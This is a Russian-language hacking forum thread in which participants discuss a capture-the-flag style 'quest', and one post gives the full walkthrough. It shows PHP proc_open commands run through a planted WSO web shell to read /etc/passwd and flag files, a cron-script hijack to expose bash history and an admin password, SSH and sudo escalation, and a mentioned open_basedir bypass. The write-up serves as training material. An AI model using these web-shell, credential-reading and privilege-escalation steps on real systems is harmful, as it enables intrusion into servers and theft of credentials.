Старый 28.12.2010, 19:06   #21
Aag
 
Регистрация: 10.12.2010
Сообщений: 2
Репутация: 2
По умолчанию

Спасибо за хороший квест. Было очень интересно.
Aag вне форума   Ответить с цитированием
Старый 28.12.2010, 23:29   #22
Chelios
 
Регистрация: 05.07.2010
Сообщений: 42
Репутация: 14
По умолчанию

по окончании квеста можно будет узнать, как всё-таки получить второй ключ?
Chelios вне форума   Ответить с цитированием
Старый 29.12.2010, 07:27   #23
FIXER
 
Аватар для FIXER
 
Регистрация: 06.07.2010
Сообщений: 219
Репутация: 51
По умолчанию

Цитата:
Сообщение от Chelios Посмотреть сообщение
по окончании квеста можно будет узнать, как всё-таки получить второй ключ?
да, после окончание квеста будет выложено полное прохождение каждого.
P.S v1d0q и Pashkela нашли другие варианты получение первого ключа.
FIXER вне форума   Ответить с цитированием
Старый 05.01.2011, 21:20   #24
hack4life
 
Регистрация: 18.12.2010
Сообщений: 6
Репутация: 0
По умолчанию

аааа не могу найти ни один рабочий эксп под это ядро
hack4life вне форума   Ответить с цитированием
Старый 05.01.2011, 21:59   #26
hack4life
 
Регистрация: 18.12.2010
Сообщений: 6
Репутация: 0
По умолчанию

для 2-го кода?
hack4life вне форума   Ответить с цитированием
Старый 08.01.2011, 20:38   #27
FIXER
 
Аватар для FIXER
 
Регистрация: 06.07.2010
Сообщений: 219
Репутация: 51
По умолчанию

Цитата:
Уважаемый владелец сервера !
Срок оплаты Вашего сервера IP 194.28.132.13 заканчивается 2011-01-10
кто не успел тот опоздал )
после 10го выложу все прохождение.
FIXER вне форума   Ответить с цитированием
Старый 11.01.2011, 03:24   #28
Arhangel
 
Регистрация: 03.01.2011
Сообщений: 3
Репутация: 1
По умолчанию

Выложите уже прохождения, уж больно интересно.
Arhangel вне форума   Ответить с цитированием
Старый 11.01.2011, 19:15   #29
FIXER
 
Аватар для FIXER
 
Регистрация: 06.07.2010
Сообщений: 219
Репутация: 51
По умолчанию

Имеется уже залитый шелл wso (спасибо oRb'у)
для получение первого ключа юзаем проц_опен
PHP код:
$proc=proc_open("cat /FIRSTCODE",
  array(
    array(
"pipe","r"),
    array(
"pipe","w"),
    array(
"pipe","w")
  ),
  
$pipes);
print 
stream_get_contents($pipes[1]); 
читаем первый ключ FIRSTCODE

и получаем RDoT_cool_hackers

и дальше по логике читаем етц/пассворд

PHP код:
$proc=proc_open("cat /etc/passwd",
  array(
    array(
"pipe","r"),
    array(
"pipe","w"),
    array(
"pipe","w")
  ),
  
$pipes);
print 
stream_get_contents($pipes[1]); 
и получаем подсказку:

Цитата:
admin:x:1000:1000:sudo,user,,:/home/admin:/bin/bash подсказку куда дальше
$proc=proc_open("ls /home/admin", получаем листинг папку cron
$proc=proc_open("ls /home/admin/cron", получаем листинг file
$proc=proc_open("cat /home/admin/cron/file", получаем

Цитата:
*/10 * * * * /usr/local/bin/php /home/www/htdocs/images/test.php > /dev/null

так как в тест не записать, а папка доступна на запись, просто мувим тест.пхп например в тест1.пхп
создаем test.php с выполнением chmod 0777 /home/admin/.bash_history
читаем баш хистори, находим админский пасс (aJarTumMyvOx80), логинимся по ссш, судо кат /SECONDCODE
Получаем второй ключ: RDoT_R00T_L3V3L

юзер прописан в /etc/sudoers

итого:шелл - процопен, крон - баш хистори - судо
и еще возможен обход open_basedir через mb_send_mail
FIXER вне форума   Ответить с цитированием
Старый 11.01.2011, 21:03   #30
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

ааааа, ми всё нашел, только до мува не додумкался ^_^ (ну типо нет записи в файл и хрен с ним)
Pashkela вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot